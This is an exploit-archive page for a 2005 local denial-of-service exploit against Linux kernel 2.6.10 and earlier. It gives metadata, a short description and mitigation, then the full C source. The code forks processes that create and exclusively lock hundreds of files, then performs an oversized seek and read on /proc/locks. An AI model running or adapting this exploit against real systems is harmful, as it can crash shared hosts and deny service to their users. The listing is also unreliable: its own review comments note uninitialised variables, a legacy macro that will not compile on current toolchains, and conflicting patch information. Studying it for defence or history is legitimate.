vendor:
Linux Kernel
by:
ChoiX
7.5
CVSS
HIGH
DOS
CWE
Product Name: Linux Kernel
Affected Version From: 2.6.2000
Affected Version To: 2.6.10
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2005

linux kernel <=2.6.10(2.6.x) DOS exploit

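This exploit targets Linux kernel versions up to 2.6.10 (2.6.x) and causes a denial of service (DoS) by creating multiple files and locking them. It was written by ChoiX of the uKt Research team. The exploit starts by creating files with specific names and then locks them; it is described as continuing to create files until the system crashes. Note that in the listing below each child process creates a fixed 920 files, and the final step is a seek and read on /proc/locks with a very large offset and length, so the lock list exposed through /proc/locks, rather than file creation alone, appears to be what is exercised.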

Mitigation:

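Update the Linux kernel to a version later than 2.6.10 to prevent this DoS. The "Patch Exists: NO" field above conflicts with this advice, so confirm from the vendor or distribution kernel changelog that the running kernel actually contains the fix. Independently of patching, per-user process and open-file limits bound how many locked files a single local account can hold; this page does not show whether such limits alone prevent the crash.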
Source

Exploit-DB raw data:

/* Removed ='s at the bottom /str0ke */

/*
 * linux kernel <=2.6.10(2.6.x) DOS exploit
 * writen by ChoiX
 * (c) uKt Research
 * [www.unl0ck.org][info@unl0ck.org]
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/file.h>
#include <syscall.h>
#include <errno.h>

/*
 * Constant used twice in main(): as the low offset word handed to _llseek()
 * and as the byte count handed to read(). 0x80004242 has bit 31 set, so it
 * is larger than INT_MAX for a 32-bit int and far larger than the 8 MiB
 * buffers main() allocates.
 */
#define SIZE 0x80004242

/*
 * Generates a direct user-space wrapper for the _llseek system call with the
 * argument order (fd, hi, lo, res, wh), bypassing the C library's lseek().
 * NOTE(review): _syscall5 is a legacy macro from old kernel headers
 * (<linux/unistd.h>); current exported headers do not provide it, so this
 * line is not expected to compile unmodified on a modern toolchain - confirm
 * against the headers in use.
 */
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh);

/*
 * Child-side helper: creates 920 files named
 * "UNLOCKRESEARCHTEAM<pid>.<index>" in the current working directory,
 * requests an exclusive flock() on each, and then spins forever so the
 * descriptors (and any locks obtained) stay held by this process.
 *
 * Never returns. Failures of open() or flock() are only reported; the loop
 * carries on, so a failed open() still reaches flock() with a negative
 * descriptor.
 *
 * Defender note: the visible footprint is a large number of files sharing
 * the fixed "UNLOCKRESEARCHTEAM" prefix, owned by processes that busy-loop
 * with hundreds of open, exclusively locked descriptors.
 */
void createfile(){
    char path[424];
    int idx = 0;

    while (idx < 920) {
        int handle;

        snprintf(path, sizeof(path), "UNLOCKRESEARCHTEAM%d.%d", getpid(), idx);
        handle = open(path, O_CREAT|O_RDWR, S_IRWXU);
        if (handle < 0) {
            printf("ERROR\n");
            perror("open()");
        }
        /* No bail-out after a failed open(): flock() is attempted regardless. */
        if (flock(handle, LOCK_EX) == -1) {
            printf("ERROR\n");
            perror("flock()");
        }
        idx++;
    }

    /* Busy-wait indefinitely; nothing is closed or unlocked. */
    for (;;)
        ;
}

/*
 * Entry point of the proof-of-concept. Sequence as written:
 *   1. print a banner and fork children that each run createfile();
 *   2. sleep 100 seconds, then run "sync" through system();
 *   3. open /proc/locks read-only;
 *   4. call _llseek() on it with hi = 42 and lo = SIZE, SEEK_SET;
 *   5. read() from it with a requested length of SIZE into an 8 MiB buffer;
 *   6. print the read() result and spin forever.
 *
 * argc and argv are not used. The trailing "return 42" is unreachable
 * because of the infinite loop before it.
 *
 * NOTE(review): several locals are read without ever being assigned
 * (count, mv, fv), which is undefined behaviour; see the inline notes.
 * The listing as published is therefore not a reliable reproducer, and its
 * observed effect on a given system should not be taken as evidence that
 * the system is or is not affected.
 */
int main(int argc, char *argv[]){
int count, fd, i, fv;
void *mv;
char *buf1, *buf2;
loff_t lr;
int nm1;

printf("\t\tkernel-2.6.10 DoS by ChoiX [Unl0ck Team]\n");
printf("[--]create files(it can take a few minutes)...");
/* nm1 is assigned here but never read afterwards. */
nm1 = 5;
/*
 * NOTE(review): count is never initialised, so the number of fork()
 * iterations is indeterminate. createfile() never returns, so a child does
 * not fall back into this loop.
 */
while(count--){
	if(!fork()){
		createfile();
	}
}
/* Fixed delay; there is no synchronisation with the children. */
sleep(100);

printf("OK\n");

printf("[--]start exploiting...");

system("sync");
/* /proc/locks is the kernel's listing of currently held file locks. */
fd=open("/proc/locks", O_RDONLY);
if(fd < 0){
	/* Failure is reported but execution continues with the invalid fd. */
	printf("ERROR\n");
	perror("open()");
}
/* Allocation results are not checked; buf1 is never used; nothing is freed. */
buf1 = malloc(1024*1024*8);
buf2 = malloc(1024*1024*8);

/* Per the _syscall5 declaration: hi = 42, lo = SIZE, result stored in lr. */
if(_llseek(fd,42,SIZE,&lr,SEEK_SET) == -1){
	printf("ERROR\n");
	/* Prints the literal text "llseek()"; errno is not reported here. */
	printf("llseek()");
}
/*
 * The requested length (SIZE, 0x80004242) is far larger than the 8 MiB
 * allocation behind buf2.
 */
i=read(fd,buf2, SIZE);
/* perror() runs unconditionally, whether or not read() failed. */
perror("read");
/*
 * NOTE(review): mv and fv are uninitialised when printed, and mv is
 * truncated through an int cast. buf2 is printed with %.300s without any
 * guarantee that it holds a terminated string.
 */
printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,buf2);
/* Busy-wait forever; the return below is never reached. */
while(42);
return 42;
}

// milw0rm.com [2005-03-29]